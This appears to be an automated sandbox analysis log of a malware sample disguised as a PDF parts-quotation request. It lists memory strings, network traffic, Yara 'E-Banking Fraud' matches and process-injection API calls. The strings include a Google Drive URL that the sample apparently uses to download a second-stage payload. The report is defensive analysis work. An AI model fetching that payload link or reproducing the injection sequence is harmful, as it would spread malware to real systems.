                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020824000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1400255818.000000007EB7A000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1450771675.0000000021EA0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.0000000020732000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp, kmtqwssC.pif.1.drString found in binary or memory: http://ocsp.comodoca.com0$
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.00000000207E8000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448668677.00000000216CE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1703117556.00000000210A0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.000000002078C000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.00000000007BE000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 0000000D.00000003.1626563650.000000000081B000.00000004.00000020.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0C
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1448938532.0000000021806000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394953813.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1452818676.000000007F170000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1394758844.000000007EC93000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020824000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000003.1400255818.000000007EB7A000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1450771675.0000000021EA0000.00000004.00000020.00020000.00000000.sdmp, Csswqtmk.PIF, 00000008.00000002.1612110184.0000000020732000.00000004.00001000.00020000.00000000.sdmp, kmtqwssC.pif, 0000000C.00000001.1542389748.0000000000890000.00000040.00000001.00020000.00000000.sdmp, kmtqwssC.pif, 00000010.00000002.2043784716.0000000000890000.00000040.00000400.00020000.00000000.sdmp, kmtqwssC.pif.1.drString found in binary or memory: http://www.pmail.com0
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.000000000090E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.000000002089D000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?expo
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.000000002087F000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1444958849.0000000020868000.00000004.00001000.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.000000000090E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.0000000000998000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.000000000097D000.00000004.00000020.00020000.00000000.sdmp, RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.0000000000959000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6&export=download
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.000000000097D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6&export=downloadP
                      Source: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe, 00000001.00000002.1402350851.0000000000998000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com:443/download?id=1IYRCMvX1A3HQ1B2VKfAKo5Zi8IP18Cl6&export=downlo
                      Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknown | HTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.11:49705 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.11:49707 version: TLS 1.2
                      Source: Yara match | File source: Process Memory Space: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe PID: 7920, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: kmtqwssC.pif PID: 7584, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: kmtqwssC.pif PID: 2260, type: MEMORYSTR

                      E-Banking Fraud

                      Source: Yara match | File source: 12.2.kmtqwssC.pif.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 12.2.kmtqwssC.pif.400000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 16.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 6.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000010.00000002.2043784716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.2013718675.0000000023100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000002.2072619441.000000002FE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.1878165557.000000002CC40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 0000000C.00000002.1977379900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      Source: initial sample | Static PE information: Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Code function: 1_2_02968254 NtReadVirtualMemory,1_2_02968254
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Code function: 1_2_029684C4 NtUnmapViewOfSection,1_2_029684C4
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Code function: 1_2_0296DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,1_2_0296DACC
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Code function: 1_2_0296DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,1_2_0296DA44
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Code function: 1_2_0296DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,1_2_0296DBB0
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Code function: 1_2_02968BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,1_2_02968BB0
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Code function: 1_2_029679B4 NtAllocateVirtualMemory,1_2_029679B4
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Code function: 1_2_02967D00 NtWriteVirtualMemory,1_2_02967D00
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Code function: 1_2_02968BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,1_2_02968BAE
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Code function: 1_2_029679B2 NtAllocateVirtualMemory,1_2_029679B2
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe | Code function: 1_2_0296D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,1_2_0296D9F0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_0042CB13 NtClose,6_2_0042CB13
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_2CE12C70
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_2CE12DF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12B60 NtClose,LdrInitializeThunk,6_2_2CE12B60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE135C0 NtCreateMutant,LdrInitializeThunk,6_2_2CE135C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12CF0 NtOpenProcess,6_2_2CE12CF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12CC0 NtQueryVirtualMemory,6_2_2CE12CC0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12CA0 NtQueryInformationToken,6_2_2CE12CA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12C60 NtCreateKey,6_2_2CE12C60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12C00 NtQueryInformationProcess,6_2_2CE12C00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12DD0 NtDelayExecution,6_2_2CE12DD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12DB0 NtEnumerateKey,6_2_2CE12DB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12D30 NtUnmapViewOfSection,6_2_2CE12D30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12D00 NtSetInformationFile,6_2_2CE12D00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12D10 NtMapViewOfSection,6_2_2CE12D10
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12EE0 NtQueueApcThread,6_2_2CE12EE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12EA0 NtAdjustPrivilegesToken,6_2_2CE12EA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12E80 NtReadVirtualMemory,6_2_2CE12E80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pif | Code function: 6_2_2CE12E30 NtWriteVirtualMemory,6_2_2CE12E30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12FE0 NtCreateFile,6_2_2CE12FE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12FA0 NtQuerySection,6_2_2CE12FA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12FB0 NtResumeThread,6_2_2CE12FB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12F90 NtProtectVirtualMemory,6_2_2CE12F90
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12F60 NtCreateProcessEx,6_2_2CE12F60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12F30 NtCreateSection,6_2_2CE12F30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12AF0 NtWriteFile,6_2_2CE12AF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12AD0 NtReadFile,6_2_2CE12AD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12AB0 NtWaitForSingleObject,6_2_2CE12AB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12BE0 NtQueryValueKey,6_2_2CE12BE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12BF0 NtAllocateVirtualMemory,6_2_2CE12BF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12BA0 NtEnumerateValueKey,6_2_2CE12BA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12B80 NtQueryInformationFile,6_2_2CE12B80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE14650 NtSuspendThread,6_2_2CE14650
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE14340 NtSetContextThread,6_2_2CE14340
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE13D70 NtOpenThread,6_2_2CE13D70
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE13D10 NtOpenProcessToken,6_2_2CE13D10
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE139B0 NtGetContextThread,6_2_2CE139B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE13090 NtSetValueKey,6_2_2CE13090
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE13010 NtOpenDirectoryObject,6_2_2CE13010
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_02898254 NtReadVirtualMemory,8_2_02898254
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_028984C4 NtUnmapViewOfSection,8_2_028984C4
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_0289DACC NtCreateFile,NtWriteFile,NtClose,8_2_0289DACC
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_0289DA44 NtDeleteFile,8_2_0289DA44
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_02898BB0 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,8_2_02898BB0
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_0289DBB0 NtOpenFile,NtReadFile,NtClose,8_2_0289DBB0
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_028979B4 NtAllocateVirtualMemory,8_2_028979B4
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_02897D00 NtWriteVirtualMemory,8_2_02897D00
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_02898BAE Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,8_2_02898BAE
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_028979B2 NtAllocateVirtualMemory,8_2_028979B2
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_0289D9F0 NtDeleteFile,8_2_0289D9F0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682B60 NtClose,LdrInitializeThunk,12_2_23682B60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_23682DF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_23682C70
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236835C0 NtCreateMutant,LdrInitializeThunk,12_2_236835C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23684340 NtSetContextThread,12_2_23684340
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23684650 NtSuspendThread,12_2_23684650
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682BE0 NtQueryValueKey,12_2_23682BE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682BF0 NtAllocateVirtualMemory,12_2_23682BF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682BA0 NtEnumerateValueKey,12_2_23682BA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682B80 NtQueryInformationFile,12_2_23682B80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682AF0 NtWriteFile,12_2_23682AF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682AD0 NtReadFile,12_2_23682AD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682AB0 NtWaitForSingleObject,12_2_23682AB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682F60 NtCreateProcessEx,12_2_23682F60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682F30 NtCreateSection,12_2_23682F30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682FE0 NtCreateFile,12_2_23682FE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682FA0 NtQuerySection,12_2_23682FA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682FB0 NtResumeThread,12_2_23682FB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682F90 NtProtectVirtualMemory,12_2_23682F90
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682E30 NtWriteVirtualMemory,12_2_23682E30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682EE0 NtQueueApcThread,12_2_23682EE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682EA0 NtAdjustPrivilegesToken,12_2_23682EA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682E80 NtReadVirtualMemory,12_2_23682E80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682D30 NtUnmapViewOfSection,12_2_23682D30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682D00 NtSetInformationFile,12_2_23682D00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682D10 NtMapViewOfSection,12_2_23682D10
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682DD0 NtDelayExecution,12_2_23682DD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682DB0 NtEnumerateKey,12_2_23682DB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682C60 NtCreateKey,12_2_23682C60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682C00 NtQueryInformationProcess,12_2_23682C00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682CF0 NtOpenProcess,12_2_23682CF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682CC0 NtQueryVirtualMemory,12_2_23682CC0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682CA0 NtQueryInformationToken,12_2_23682CA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23683010 NtOpenDirectoryObject,12_2_23683010
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23683090 NtSetValueKey,12_2_23683090
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236839B0 NtGetContextThread,12_2_236839B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23683D70 NtOpenThread,12_2_23683D70
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23683D10 NtOpenProcessToken,12_2_23683D10
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029685DC CreateProcessAsUserW,1_2_029685DC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236E591012_2_236E5910
